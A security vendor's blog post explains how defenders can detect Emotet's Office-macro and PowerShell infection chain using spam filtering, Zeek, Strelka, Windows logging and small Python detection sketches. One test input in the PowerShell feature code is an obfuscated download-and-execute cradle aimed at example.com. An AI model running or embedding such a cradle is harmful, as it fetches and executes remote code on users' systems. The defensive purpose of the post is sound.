ThreatEx Labs

PatternEx ThreatEx Labs features timely and actionable insights from world-class security researchers with AI expertise.
Readers will enhance their skill sets with tools and knowledge to efficiently leverage AI for information security.

Exploring Detection Signals from Weaponized Office Documents

Microsoft Office documents have re-established themselves in recent years as viable springboards for pillaging the digital assets of enterprises globally. They are particularly common in the Delivery phase (KC3) and occasionally the Actions on Objectives phase (KC7) of Lockheed Martin's Cyber Kill Chain framework. In this post, we'll examine a recent information-stealing trojan known as Emotet. We'll also explore the data sources and tools enterprise defenders can leverage to detect or hunt infections that evade basic signature- or rule-based defenses.

Background

Office documents have plenty of bells and whistles that are ripe for abuse by threat actors, such as Visual Basic for Applications (VBA) macros, Dynamic Data Exchange (DDE), and Object Linking and Embedding (OLE). These documents are commonly used as "downloaders" and are particularly effective in the initial stages of an attack. Generally speaking, they serve two purposes:

  1. On the surface, the document gives the user the impression that it is legitimate and baits them into enabling macros (if necessary).
  2. Behind the scenes, it abuses Office features like VBA macros to download and execute a payload with comprehensive malicious capabilities. These scripts or commands leverage interpreters that are natively built into Microsoft Windows, such as PowerShell.

Emotet Banking Trojan

US-CERT released an advisory thoroughly describing the Emotet banking trojan. The diagram below illustrates what this attack looks like:

[Figure: Emotet infection chain diagram from the US-CERT advisory]

Source: https://www.us-cert.gov/ncas/alerts/TA18-201A


The US-CERT advisory emphasizes that "Emotet is a polymorphic banking Trojan that can evade typical signature-based detection". This poses a non-trivial problem for enterprise defenders; if only a handful of security vendors possess capabilities for detecting these threats when they're first discovered in the wild, how do we go about detecting tomorrow's threats? How do we buck the trend of reacting to these threats after the fact, and instead develop proactive, robust and reliable detection capabilities without a crystal ball or pure luck?

To answer these questions, let's step through each phase of the infection chain and explore some possible detection strategies.

Step 1: Delivery via social engineering

The initial inbound phishing email contains a malicious URL. One of the Emotet URLs was hxxp://baute[.]org/files/En_us/Client/Invoice-2667266/.

The US-CERT advisory states that most campaigns imitate PayPal receipts, shipping notifications, or "past-due" invoices. Spam filtering is a great use case for machine learning for three reasons:

  1. There's a mountain of historical data for training.
  2. Characteristics generalize easily, for example with a bag-of-words representation of e-mail bodies.
  3. Users provide real-time feedback that supports incremental learning.

With some tuning, regular expressions and string matching can be effective as well. A popular security researcher, SwiftOnSecurity, generously open-sourced several useful Exchange Transport rules that are worth exploring.
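The bag-of-words and incremental-learning ideas above can be illustrated with a small multinomial naive Bayes filter. The sketch below uses only the Python standard library. The class name, labels, and training messages are hypothetical. A production filter would need far more data, better tokenization, and proper evaluation.

```python
import math
import re
from collections import Counter, defaultdict


def tokenize(text: str) -> list[str]:
    """Lowercase bag-of-words tokenizer that keeps alphanumeric runs only."""
    return re.findall(r"[a-z0-9]+", text.lower())


class NaiveBayesFilter:
    """Multinomial naive Bayes over word counts (hypothetical example class).

    learn() only updates counters, so user feedback such as a
    "report phishing" click can be absorbed one message at a time.
    """

    def __init__(self) -> None:
        self.word_counts = defaultdict(Counter)  # label -> token counts
        self.doc_counts = Counter()              # label -> number of messages
        self.vocab = set()

    def learn(self, text: str, label: str) -> None:
        tokens = tokenize(text)
        self.word_counts[label].update(tokens)
        self.doc_counts[label] += 1
        self.vocab.update(tokens)

    def predict(self, text: str) -> str:
        total_docs = sum(self.doc_counts.values())
        scores = {}
        for label in self.doc_counts:
            # Log prior plus Laplace-smoothed log likelihood of each token
            score = math.log(self.doc_counts[label] / total_docs)
            denom = sum(self.word_counts[label].values()) + len(self.vocab)
            for token in tokenize(text):
                score += math.log((self.word_counts[label][token] + 1) / denom)
            scores[label] = score
        return max(scores, key=scores.get)


nb = NaiveBayesFilter()
nb.learn("Your PayPal receipt is attached, open the invoice", "phish")
nb.learn("Past-due invoice: click here to view payment details", "phish")
nb.learn("Agenda for Tuesday's team meeting", "ham")
nb.learn("Lunch order for the team offsite", "ham")
print(nb.predict("Invoice past-due, view attached receipt"))  # → phish
```

Naive Bayes is chosen here because it is simple and its counts update cheaply. Any incrementally trainable classifier would serve the same role.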

Another interesting approach would be to deploy Bro IDS (recently renamed "Zeek") to passively monitor SMTP traffic. A Bro script is available that logs URLs discovered in e-mail traffic and also watches for those URLs to be visited via HTTP requests. Correlating the URLs against blacklists, newly observed domains, and other heuristics would be a great place to start looking for malicious links.
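The Bro script itself is written in Bro's own scripting language. The Python sketch below only illustrates the correlation logic. It assumes the logs have already been parsed into URL strings (from SMTP) and `(host, uri)` pairs (from HTTP). The function name, input shapes, and example domains are hypothetical.

```python
from urllib.parse import urlsplit


def correlate(email_urls, http_requests, known_domains, blocklist):
    """Flag e-mailed URLs that were later requested over HTTP (hypothetical helper).

    email_urls:    iterable of URL strings extracted from SMTP traffic
    http_requests: iterable of (host, uri) tuples from HTTP logs
    known_domains: set of domains previously observed in the environment
    blocklist:     set of known-bad domains
    Returns a list of (url, reasons) tuples for URLs that were visited.
    """
    # Index HTTP requests by (host, path) so each lookup is O(1); drop query strings.
    visited = {(host.lower(), uri.split("?", 1)[0]) for host, uri in http_requests}
    alerts = []
    for url in email_urls:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        path = parts.path or "/"
        if (host, path) not in visited:
            continue  # e-mailed but never clicked
        reasons = ["visited"]
        if host in blocklist:
            reasons.append("blocklisted")
        if host not in known_domains:
            reasons.append("newly observed domain")
        alerts.append((url, reasons))
    return alerts


alerts = correlate(
    ["http://billing.example.net/files/Invoice-1234/", "https://intranet.corp.example/wiki"],
    [("billing.example.net", "/files/Invoice-1234/"), ("intranet.corp.example", "/wiki?page=2")],
    known_domains={"intranet.corp.example"},
    blocklist=set(),
)
```

Passive monitoring only sees full URLs for cleartext HTTP. HTTPS requests would need another data source, such as proxy logs.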

Step 2: Word document download with heavily obfuscated macros

While signatures excel at identifying very specific patterns, they tend to be ineffective at holistically generalizing the characteristics that define a particular class of activity (e.g., obfuscated VBA macros). Additionally, they focus almost exclusively on the presence of malicious characteristics while ignoring the absence of benign ones. This is a gap that machine learning can fill quite nicely. Below is a snippet of the obfuscated macros present in one of the Emotet downloaders (MD5: aaaa79611eb2b3fb2219bde6d979a0b4; a sandbox analysis is available from any[.]run).

[Figure: snippet of the obfuscated VBA macros in the Emotet downloader]
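A model generalizes from features rather than exact strings. This makes it easier to see how it could flag obfuscation in general. The Python sketch below computes a few plausible features from macro source text. The feature set is a hypothetical illustration, not a validated one. A real detector would be trained and tested on labeled benign and malicious macros.

```python
import re


def vba_obfuscation_features(code: str) -> dict:
    """Illustrative features for spotting obfuscated VBA (hypothetical feature set)."""
    lines = [ln for ln in code.splitlines() if ln.strip()]
    identifiers = re.findall(r"\b[A-Za-z_][A-Za-z0-9_]*\b", code)
    symbols = sum(1 for c in code if not (c.isalnum() or c.isspace()))
    return {
        # Chr()/ChrW() calls are a common way to hide string literals
        "chr_calls": len(re.findall(r"\bChrW?\s*\(", code, re.IGNORECASE)),
        # '&' is VBA's string concatenation operator (it also appears in &H hex
        # literals, so this count is approximate)
        "concat_ops": code.count("&"),
        # Obfuscators often emit very long single-line expressions
        "max_line_len": max((len(ln) for ln in lines), default=0),
        # Random-looking generated identifiers tend to be long
        "avg_identifier_len": (
            sum(map(len, identifiers)) / len(identifiers) if identifiers else 0.0
        ),
        # Share of characters that are neither alphanumeric nor whitespace
        "symbol_ratio": symbols / len(code) if code else 0.0,
    }


features = vba_obfuscation_features('x = Chr(112) & ChrW(111) & "wer"\nShell x')
```

The resulting dictionaries can be turned into vectors for any classifier. The key idea is that both the presence of obfuscation traits and the absence of ordinary, readable code contribute to the score.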

 

Deobfuscating the macros (as I did using a tool named ViperMonkey) reveals the following PowerShell command. Ironically, the command passed to the PowerShell interpreter is itself obfuscated:

[Figure: ViperMonkey output showing the deobfuscated, still-obfuscated PowerShell command]

Can you write a signature to detect this?

My suggestion would be to deploy Strelka, a distributed file scanning platform recently open-sourced by Josh Liburdi and the security team at Target. One of its 40+ modules, scan_vba.py, extracts and analyzes VBA macros from document files. Other modules that might be useful scan files with YARA rules, calculate file entropy, extract strings, and perform dynamic analysis using Cuckoo Sandbox. Perhaps a custom analyzer that uses machine learning to detect obfuscated VBA macros, and then automatically sandboxes or deobfuscates them, could prove to be an effective detection strategy.
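File entropy is one of the signals mentioned above. The standard Shannon formula is short enough to show directly. The Python sketch below is a generic implementation, not Strelka's module code.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, at most 8.0."""
    if not data:
        return 0.0
    total = len(data)
    # Sum of -p * log2(p) over the frequency of each distinct byte value
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


print(shannon_entropy(b"ab"))  # → 1.0
```

Values close to 8.0 suggest compressed or encrypted content. Modern Office formats such as .docm are ZIP archives, so the entropy of the whole file is naturally high. Computing entropy over extracted streams or macro text is usually more informative.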


Step 3: PowerShell payload download and execution

There are three options for collecting endpoint telemetry of invoked PowerShell commands:

  1. command-line process auditing in Windows Security logs (Event ID 4688),
  2. process creation events in Sysmon logs (Event ID 1), or
  3. script block and module logging in PowerShell logs (Event IDs 4104 and 4103; script block logging requires PowerShell v5).
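Process creation logs are a natural place to catch the common `-EncodedCommand` trick. The argument to `-EncodedCommand` is Base64-encoded UTF-16LE text, so it can be decoded directly.

The Python sketch below makes a few assumptions. Events are already parsed into dicts with `Image` and `CommandLine` keys, shaped like Sysmon process creation records. The regular expression covers the common abbreviations of the flag (`-e`, `-ec`, `-enc`, `-EncodedCommand`, and so on). That pattern and the function name are hypothetical.

```python
import base64
import binascii
import re

# Matches -e, -ec, -en, -enc, ... -EncodedCommand (case-insensitive) plus its argument.
ENC_ARG = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_commands(events):
    """Yield (event, decoded_script) for PowerShell runs that pass an encoded command.

    events: iterable of dicts with 'Image' and 'CommandLine' keys (assumed,
    already-parsed Sysmon-style process creation records).
    """
    for event in events:
        image = event.get("Image", "").lower()
        if not image.endswith(("powershell.exe", "pwsh.exe")):
            continue
        match = ENC_ARG.search(event.get("CommandLine", ""))
        if not match:
            continue
        try:
            # -EncodedCommand takes Base64 over UTF-16LE text
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64/UTF-16LE; leave for other rules
        yield event, decoded
```

Decoding at collection time lets ordinary string rules run against the real script rather than an opaque Base64 blob.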

While installing and configuring these utilities is free, costs could certainly be incurred from MPLS bandwidth when shipping logs to a central location, or from storing the data in SIEMs that charge by log volume. PatternEx customers, however, enjoy unlimited log volume ingestion.

Script block logging records the raw commands passed to the PowerShell interpreter. Obfuscated commands like the one shown below have distinctive characteristics that make them easy to distinguish from benign PowerShell commands. Examples include high frequencies of special characters, high entropy, and token-level features from PowerShell's tokenizer. Last year, Daniel Bohannon and Lee Holmes released Revoke-Obfuscation, a PowerShell obfuscation detection framework driven by supervised machine learning. I'd strongly encourage you to check it out.

[Figure: obfuscated PowerShell command captured by script block logging]
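The character-level signals mentioned above can be approximated in a few lines. The Python sketch below is an illustration only and not Revoke-Obfuscation's feature set. The special-character set, the word-length cutoff, and the function names are all assumptions.

```python
import re

# Characters that obfuscated PowerShell tends to use heavily (assumed set).
SPECIAL_CHARS = set("`'\"+{}()[]$-;&|^")
FORMAT_OP = re.compile(r"-f\b", re.IGNORECASE)  # PowerShell's -f format operator
WORD = re.compile(r"[A-Za-z]{4,}")


def case_flip_ratio(word: str) -> float:
    """Fraction of adjacent letter pairs that switch case ('dOwNlOaD' -> 1.0)."""
    flips = sum(1 for a, b in zip(word, word[1:]) if a.islower() != b.islower())
    return flips / max(len(word) - 1, 1)


def powershell_obfuscation_features(script: str) -> dict:
    """Character-level features for a script block (hypothetical feature set)."""
    words = WORD.findall(script)
    return {
        "special_ratio": sum(c in SPECIAL_CHARS for c in script) / len(script) if script else 0.0,
        "backticks": script.count("`"),  # backtick escapes break up keywords
        "format_operators": len(FORMAT_OP.findall(script)),  # '{1}{0}' -f reordering
        # Randomized casing (e.g. 'nEw-oBjEcT') flips case far more often than CamelCase
        "avg_case_flip": sum(map(case_flip_ratio, words)) / len(words) if words else 0.0,
    }


benign = powershell_obfuscation_features("Get-ChildItem -Path C:\\Temp | Select-Object Name")
obfuscated = powershell_obfuscation_features(
    "&('{1}{0}'-f'EX','I') (nEw-oBjEcT NeT.WeBcLiEnT).dOwNlOaDsTrInG('http://example.com/a')"
)
```

Case flips are measured per letter pair rather than as "mixed case yes/no". This choice avoids penalizing legitimate CamelCase names such as `DownloadString`, which flip only at word boundaries.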

Module logging, however, unravels most of these obfuscation techniques and shows the decoded commands actually invoked by the PowerShell engine. Rules, signatures, or regular expressions may prove useful here. The screenshot below depicts the decoded PowerShell command responsible for downloading and running the malicious executable. The command cycles through five URLs, attempting to download and execute the content (an information-stealing binary):

[Figure: decoded PowerShell command captured by module logging]
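Once the command is decoded, a simple regular-expression rule can pull out the download URLs for blocking or pivoting.

The Python sketch below assumes the URLs appear as plain `http(s)://` strings. It also assumes several URLs may be packed into one delimited string. For that reason, it stops at `@`, quotes, commas, semicolons, and closing parentheses, which could truncate legitimate URLs that contain those characters. The function names and sample command are hypothetical. The `defang` helper produces the `hxxp`/`[.]` style used earlier in this post.

```python
import re

# Stop at whitespace, quotes, and common delimiters (assumption: several URLs
# may be packed into one delimited string).
URL_RE = re.compile(r"https?://[^\s'\"@,;)]+", re.IGNORECASE)


def extract_urls(command: str) -> list[str]:
    """Return unique URLs in order of first appearance."""
    return list(dict.fromkeys(m.group(0) for m in URL_RE.finditer(command)))


def defang(url: str) -> str:
    """Make a URL safe to share: http -> hxxp, and '.' -> '[.]' in the host part."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("tt", "xx", 1) + "://" + host.replace(".", "[.]") + sep + path


cmd = "$u='http://a.example/x@https://b.example/y'.Split('@');foreach($x in $u){Write-Host $x}"
print([defang(u) for u in extract_urls(cmd)])  # → ['hxxp://a[.]example/x', 'hxxps://b[.]example/y']
```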

 

Conclusion

Whether it's fileless malware, cryptominers, insider threats, or commodity malware, the threat landscape has never been as diverse as it is today. The concept of defense-in-depth is crucial for security teams to keep pace with evolving attacker tradecraft.

Thanks for reading!

 

PatternEx Threat Prediction Platform Architecture

Learn how PatternEx dynamically accepts security analysts' feedback to create predictive models that continuously adapt to detect new and existing threats. Using this feedback, PatternEx is continuously trained to improve detection accuracy. Download the white paper to learn more.
